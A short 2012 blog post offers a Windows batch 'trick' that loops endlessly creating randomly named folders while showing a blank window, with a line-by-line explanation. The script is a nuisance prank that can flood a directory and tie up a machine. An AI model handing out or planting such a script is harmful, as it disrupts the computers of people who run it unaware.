Tuesday, 7 August 2012

CREATE INFINITE FOLDER IN SINGLE CLICK

Early i posted create 20 folder at single click
Here i post a simple trick to create infinite folder with a single click
it is a notepad code,

open note pad
copy this code to notepad



@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop


save this file with .bat extention   (eg:trickzzworld.bat)
That’s all if you double click the file it will create a finite folder wherever the batch file is.

No comments:

Post a Comment